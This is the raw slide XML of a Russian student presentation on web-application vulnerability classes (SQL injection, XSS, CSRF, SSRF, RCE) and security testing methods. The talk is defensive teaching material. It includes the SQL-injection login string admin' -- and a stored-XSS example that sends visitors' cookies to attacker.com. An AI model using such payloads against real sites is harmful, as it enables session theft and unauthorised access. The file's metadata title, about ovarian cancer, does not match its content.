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19.02.2026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Артём Тищенко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310C514-78B5-41DB-8930-F5D78A5CC2C1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19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DC4A79-1BE2-46C6-89CE-E04004D0936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FDA42E-6EC7-4BE8-B5A5-14C7266AB97E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5D5A74-8F7B-4601-9C35-A04EB31AD24D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ru-RU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953AD0-3B74-44F2-AC09-E607077386AB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AE9E60-15E8-43CE-A455-F4DD39AE2FDB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D01E096-595D-414D-9FAF-F86DF1E19A2E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8EA5CC-E428-4236-99C9-ADB4CE03E09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146D56-E854-40B3-BF2D-99C365F5565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FCCBEB4-E390-40D6-95B4-1691FD5F731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</a:t>
            </a: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</a:t>
            </a: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Level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</a:t>
            </a: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Level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</a:t>
            </a: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Level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</a:t>
            </a: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Outline </a:t>
            </a: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Level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0C2C4E-822A-47A7-A29A-19C76D844738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2385360"/>
            <a:ext cx="9143640" cy="1729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Century Gothic"/>
              </a:rPr>
              <a:t>Классификация уязвимостей в веб-приложениях. Тестирование веб-приложений на уязвимости</a:t>
            </a:r>
            <a:endParaRPr lang="ru-RU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1523880" y="5257800"/>
            <a:ext cx="9143640" cy="986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Тищенко Артём, гр. 5130201/20101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Подзаголовок 2"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1523880" y="5735520"/>
            <a:ext cx="9143640" cy="50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202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Рисунок 4"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId1"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="390600" y="381600"/>
            <a:ext cx="931680" cy="931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TextBox 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1322640" y="381600"/>
            <a:ext cx="1009224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Санкт-Петербургский Политехнический Университет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Институт компьютерных наук и кибербезопасности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Актуальность темы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Для бизнеса веб-приложения это один из основных каналов взаимодействия с клиентами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Веб-приложение может быть атаковано злоумышленником из любой точки мира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Сложность веб-приложений растёт, а с ней увеличивается и поверхность для атаки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По данным BI.ZONE за 2025 год каждый месяц появляется в среднем 1,5 тысячи новых уязвимостей.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4E2EB1C-4992-49E9-B5C7-8674230C7E2A}" type="slidenum">
              <a:t>2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127E3AF2-3EB8-45D2-AF76-55164D5A09B8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Актуальность темы: VK 2026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48769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Около 500 000 аккаунтов VK скомпрометировано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Вредоносный распространялся через расширение VK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Styles для браузера Google Chrome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Начало 2026 года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9" name=""/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId1"/>
          <a:srcRect l="5752" t="15558" r="6285" b="16892"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5715000" y="2286000"/>
            <a:ext cx="6400440" cy="274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7D321A-884D-46CF-B722-CD718B8193FC}" type="slidenum">
              <a:t>3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24E16BE6-2DCC-4812-8117-CE2379942B65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Актуальность темы: CVE-2025-55182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46483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React2Shell в Next.js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Атака полностью автоматизирована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Декабрь 2025 года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2" name=""/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId1"/>
          <a:srcRect l="0" t="28219" r="6670" b="1948"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5257800" y="1828800"/>
            <a:ext cx="6400440" cy="20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"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5273280" y="4015080"/>
            <a:ext cx="6385320" cy="192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9E71674-98E6-4459-BE92-7E9858F877C4}" type="slidenum">
              <a:t>4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00A75B2D-5BBF-4C96-8FEE-16FE525B3FC1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Цель и задачи доклада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Цель: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Познакомиься с основными уязвимостями веб-приложений и методами их тестирования.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Задачи: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Рассмотреть классификацию наиболее распространённых уязвимостей веб-приложений, таких как SQL-инъекции, XSS, CSRF и другие.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Ознакомиться с основными методами и инструментами тестирования веб-приложений на уязвимости.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Обозначить базовые меры по повышению уровня безопасности веб-приложений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5B772FD-3581-4F26-B11A-7CB7CB9A355D}" type="slidenum">
              <a:t>5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2E79F314-1E87-4EE9-84C9-D88205113442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SQL-инъекции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838080" y="2286000"/>
            <a:ext cx="8991720" cy="388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Позволяет исполнять произвольные SQL запросы к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базе данных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Возникает из-за некорректной обработки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пользовательского ввода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Параметризованные запросы и ORM системы хорошо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защищают от этой уязвимости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7ACA9B7-03CB-48D1-A4FF-22AE82715C26}" type="slidenum">
              <a:t>6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C1573E3A-482F-4ADB-B411-AA0AE4539F87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SQL-инъекции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89917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Простой пример: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Злоумылшенник вводит логин </a:t>
            </a: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admin' --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0" name=""/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId1"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="914400" y="2268000"/>
            <a:ext cx="10744200" cy="93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"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="914400" y="3886200"/>
            <a:ext cx="10744200" cy="107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4B0FDBA-9E7E-4FC7-B241-55674A36554C}" type="slidenum">
              <a:t>7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DFC3E497-BDB6-4A24-BCCB-40E8DEBA27CC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XSS-атака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38080" y="2286000"/>
            <a:ext cx="10134720" cy="388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XSS - Cross-Site Scripting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Вредоносный JavaScript код внедряется в веб-страницу и выполняется в браузере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Позволяет красть cookies и сессионные токены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Возникает из-за некорректной обработки пользовательского ввода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91DF558-EF53-42AB-B68B-14DA1F9C7248}" type="slidenum">
              <a:t>8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2FE30B06-8DBA-42FB-B95A-229C4266F38F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XSS-атака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8205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Простой пример с именем пользователя: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Андрей&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="0" u="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="c9211e"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uFillTx/>
                <a:latin typeface="Calibri"/>
              </a:rPr>
              <a:t>script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&gt;document.location=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="0" u="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="e8a202"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uFillTx/>
                <a:latin typeface="Calibri"/>
              </a:rPr>
              <a:t>'&lt;https://attacker.com/?cookie='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+</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="0" u="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="127622"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uFillTx/>
                <a:latin typeface="Calibri"/>
              </a:rPr>
              <a:t>encodeURIComponent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(document.cookie)+</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="0" u="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="e8a202"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uFillTx/>
                <a:latin typeface="Calibri"/>
              </a:rPr>
              <a:t>'&gt;'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&lt;/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="0" u="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="c9211e"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uFillTx/>
                <a:latin typeface="Calibri"/>
              </a:rPr>
              <a:t>script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&gt;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Если приложение сохраняет текст в базе данных в таком виде, а затем без обработки выводит его на странице, каждый, кто просмотрит профиль этого пользователя, отправит атакующему свои cookie.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6A20F5B-CC5A-41D0-B155-0103FF210A6A}" type="slidenum">
              <a:t>9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0C5DB6CE-3D51-4250-96BF-D656AF49D3DE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XSS-атака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8205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MySpace Samy worm (2005 год):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JavaScript код в поле профиля «About me»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Код автоматически добавлял Samy в друзья каждому, кто открывал заражённый профиль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Параллельно скрипт копировал себя в профиль жертвы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За ~20 часов заразил более 1 млн аккаунтов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Samy Kamkar получил условный срок и запрет на использование компьютера на 3 года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2568761-D559-42C2-AC38-D2E822429FA4}" type="slidenum">
              <a:t>10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1ABCC21B-791B-4AFA-B8FE-1166842052A7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CSRF-атака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838080" y="2286000"/>
            <a:ext cx="10134720" cy="388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CSRF или XSRF (Cross-Site Request Forgery)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Позволяет выполнять действия от лица авторизованного пользователя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Защититься можно используя правильные настройки Cookie (SameSite) и CSRF-токены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16357A4-3AA7-49B7-A749-47887CBAB2DF}" type="slidenum">
              <a:t>11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21FBC266-1ABA-4285-942A-7047049434E4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CSRF-атака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134720" cy="388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AutoNum type="arabicParenR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Пользователь заходит, например, в банк.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AutoNum type="arabicParenR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Не выходя из него, заходит на сайт злоумышленника.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AutoNum type="arabicParenR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На evil.com есть, например, такой HTML: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2" name=""/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId1"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1828800" y="2286000"/>
            <a:ext cx="3886200" cy="95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"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1828800" y="3836520"/>
            <a:ext cx="1884960" cy="735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"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="5257800"/>
            <a:ext cx="11430000" cy="807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52FCC0-6922-4E42-B0AC-12D47B0AC8F5}" type="slidenum">
              <a:t>12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87408363-D64C-4120-B68C-9BA3850F0FF6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Типы уязвимостей: CSRF-атака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134720" cy="388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AutoNum type="arabicParenR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Пользователь залогинен в админке роутера.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800" b="1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http://192.168.0.1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AutoNum type="arabicParenR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На сайте злоумышленника код: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7" name=""/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId1"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1143000" y="3657600"/>
            <a:ext cx="6858000" cy="2611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20756C9-2201-405D-87E7-41E99EFBD435}" type="slidenum">
              <a:t>13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3228A030-1AC3-424B-BCCB-09944B31A279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Другие типы уязвимостей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1347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IDOR (Insecure Direct Object Reference)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SSRF (Server-Side Request Forgery) – заставляет сервер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слать запросы по желанию злоумышленника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File Upload / Path Traversal – небезопасная работа с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файлами, которые загружают пользователи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RCE (Remote-Code Execution) – запуск произвольного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кода на сервере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0" name=""/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId1"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1143000" y="2364840"/>
            <a:ext cx="7772400" cy="79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3E8A395-9CFD-4683-86CB-033E07710CE0}" type="slidenum">
              <a:t>14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F0B27B0D-D370-46EE-A483-C09B2D61E402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Тестирование веб-приложений на уязвимости: SCA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8205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SCA (Software Composition Analysis)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GitHub Dependabot, OWASP Dependency-Check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3" name=""/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId1"/>
          <a:srcRect l="0" t="0" r="4" b="0"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2491920" y="2795400"/>
            <a:ext cx="7566480" cy="360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6F68357-910A-4FDF-B2FA-1A01C8D7D720}" type="slidenum">
              <a:t>15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9231253D-3885-4B2E-8AD3-C13C36711BE0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Тестирование веб-приложений на уязвимости: SAST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53341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SAST (Static Application Security Testing)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SonarQube, CodeQL, Semgrep и другие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«Белый ящик»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6" name=""/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId1"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5259240" y="1690200"/>
            <a:ext cx="6399360" cy="457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20B8460-CEA5-426B-AEA4-F82EA6A040E1}" type="slidenum">
              <a:t>16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0AFD93DB-0D8B-420D-B433-B56D404C1A0C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Тестирование веб-приложений на уязвимости: DAST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51055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DAST (Dynamic Application Security Testing)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OWASP ZAP, Burp Suite, Netsparker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«Чёрный ящик»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"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId1"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5715000" y="1714320"/>
            <a:ext cx="6629400" cy="422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3547BC-0006-4AA1-99DF-029F33E18E28}" type="slidenum">
              <a:t>17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CD16335D-0DB6-4370-BF39-888959015F61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Тестирование веб-приложений на уязвимости: Penetration testing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51055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Penetration Testing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Проводится несколько раз в год или перед крупными релизами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«Чёрный ящик», «Белый ящик», «Серый ящик»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Цель не просто найти уязвимости, а скомпрометировать систему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12" name=""/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId1"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5715000" y="1714320"/>
            <a:ext cx="6629400" cy="422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08103E6-1027-4B9B-A728-49468C9A4D1F}" type="slidenum">
              <a:t>18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192457A9-18ED-4D2B-81BB-89B3FAE62537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Заключение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838080" y="1828800"/>
            <a:ext cx="1036332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Веб-приложения это одно из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самых уязвимых мест     для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атаки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Всегда нужно тщательно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валидировать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пользовательский ввод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Современные атаки часто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автоматизированы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Обеспечение безопасность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веб-приложений — это не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разовая задача, а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непрерывный процесс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4CE4B2-E660-4782-9078-9C95A55E1DDB}" type="slidenum">
              <a:t>19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D4A0B3A5-F467-4931-A6E6-8A6743A92066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838080" y="2766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Спасибо за внимание!</a:t>
            </a:r>
            <a:endParaRPr lang="ru-RU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Артём Тищенко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9F0E664-9E24-4E6A-A33F-101F1DA07B3F}" type="slidenum">
              <a:t>20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4909E147-0E54-46AB-8B59-99A20EC92953}" type="datetime1">
              <a:rPr lang="en-US"/>
              <a:t>02/19/2026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1473</TotalTime>
  <Application>LibreOffice/25.8.4.2$Linux_X86_64 LibreOffice_project/580$Build-2</Application>
  <AppVersion>15.0000</AppVersion>
  <Words>527</Words>
  <Paragraphs>127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2024-09-12T09:28:35Z</dcterms:created>
  <dc:creator>Артём Тищенко</dc:creator>
  <dc:description/>
  <dc:language>en-US</dc:language>
  <cp:lastModifiedBy/>
  <cp:lastPrinted>2026-02-19T10:05:31Z</cp:lastPrinted>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2026-02-19T10:10:26Z</dcterms:modified>
  <cp:revision>31</cp:revision>
  <dc:subject/>
  <dc:title>Classification of paclitaxel-resistant ovarian cancer cells using holographic flow cytometry through interpretable machine learning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20</vt:i4>
  </property>
</Properties>
</file>